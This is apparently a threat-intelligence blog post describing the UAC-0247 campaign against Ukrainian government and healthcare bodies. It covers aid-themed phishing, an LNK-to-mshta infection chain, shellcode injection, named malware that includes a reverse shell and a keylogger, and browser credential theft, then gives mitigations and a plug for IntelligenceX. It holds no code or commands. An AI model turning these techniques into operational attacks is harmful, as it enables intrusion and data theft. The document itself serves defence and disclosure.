The cybersecurity landscape continues to shift toward more targeted, stealth-driven operations, and the UAC-0247 campaign is a clear example of this evolution. Recently disclosed by CERT-UA, this campaign specifically targeted Ukrainian government institutions and healthcare organizations, including clinics and emergency response facilities, with a sophisticated malware framework engineered for persistence, surveillance, and large-scale data exfiltration.
Observed between March and April 2026, the campaign reflects a calculated and multi-layered approach that combines social engineering, exploitation of trusted systems, and advanced malware deployment techniques. While attribution remains unclear, the operational discipline and technical complexity strongly suggest involvement from a well-funded and organized threat group.
Phishing Strategy Tailored for Maximum Impact
The initial access vector used in this campaign revolves around phishing emails that appear to be legitimate humanitarian aid proposals. This theme is strategically chosen to exploit trust, urgency, and emotional response, particularly in environments where such communications are common.
Recipients who engage with these emails are directed to malicious links. These links either lead to compromised legitimate websites—where attackers exploit vulnerabilities such as cross-site scripting—or to convincing fake websites generated using artificial intelligence tools.
This dual approach significantly increases success rates. Victims are more likely to trust a legitimate domain, while AI-generated phishing pages allow attackers to scale operations without sacrificing realism. The ultimate objective is to trick users into downloading a malicious file disguised as legitimate content.
Execution Chain: A Layered Approach to System Compromise
Once the victim downloads the file, the attack progresses through a carefully structured execution chain. The file is typically a Windows shortcut (LNK), which serves as the trigger for the infection process.
When opened, the LNK file leverages the built-in Windows utility “mshta.exe” to execute a remote HTML Application (HTA). This technique is widely used by attackers because it relies on legitimate system tools, making detection more difficult.
The HTA file presents a decoy interface to the victim, creating the illusion of a normal process while executing malicious actions in the background. It downloads additional payloads and injects shellcode into trusted processes such as runtimeBroker.exe.
This process injection technique is particularly effective because it allows the malware to operate within legitimate system processes, bypassing many traditional security controls.
In more advanced scenarios, the attackers deploy a two-stage loader system. The second stage is built using a custom executable format that supports dynamic imports and structured execution. The payload is encrypted and compressed, making it significantly harder to analyze or detect.
Persistence and Command-and-Control Mechanisms
Maintaining access is a critical component of the campaign. To achieve this, attackers deploy a reverse shell known as RAVENSHELL, which establishes a persistent connection to a command-and-control server.
This allows attackers to execute commands remotely, using standard tools such as cmd.exe, which further reduces the likelihood of detection.
In addition to RAVENSHELL, the attackers deploy a malware family known as AGINGFLY. Developed in C#, this malware provides extensive control over compromised systems, enabling attackers to execute commands, capture keystrokes, download files, and deploy additional payloads.
Another key component is SILENTLOOP, a PowerShell-based script designed to enhance resilience. It retrieves command-and-control server addresses from Telegram channels and includes fallback mechanisms to ensure continuous operation even if primary infrastructure is disrupted.
Data Exfiltration and Post-Exploitation Activities
The primary objective of the UAC-0247 campaign is data theft. Attackers focus on extracting sensitive information from Chromium-based browsers, including stored credentials, cookies, and session data.
They also deploy specialized tools to extract data from WhatsApp Web, allowing access to private communications.
Beyond data exfiltration, the attackers conduct reconnaissance and lateral movement within compromised networks. Tools used in the campaign enable network scanning, tunneling, and expansion into additional systems.
In some cases, cryptocurrency mining tools have also been observed, suggesting that financial gain may be a secondary objective.
Why Traditional Security Measures Are Not Enough
The techniques used in this campaign make it particularly challenging to detect. By leveraging legitimate system tools, encrypting payloads, and using multi-stage execution chains, attackers can operate without triggering traditional security alerts.
This is where platforms like IntelligenceX become essential. IntelligenceX provides organizations with visibility into exposed assets, malicious infrastructure, and emerging threat patterns.
By using IntelligenceX, security teams can identify suspicious domains, monitor attacker infrastructure, and correlate threat intelligence across multiple sources.
Mitigation and Defense Strategies
Organizations should restrict execution of high-risk file types such as LNK, HTA, and JavaScript files. Limiting the use of tools like mshta.exe and PowerShell can also reduce the attack surface.
User awareness training is equally important, as phishing remains one of the most effective attack vectors.
Conclusion
The UAC-0247 campaign highlights the growing sophistication of cyber threats targeting critical infrastructure. Organizations must adopt proactive, intelligence-driven security strategies to defend against these evolving risks.
Top comments (0)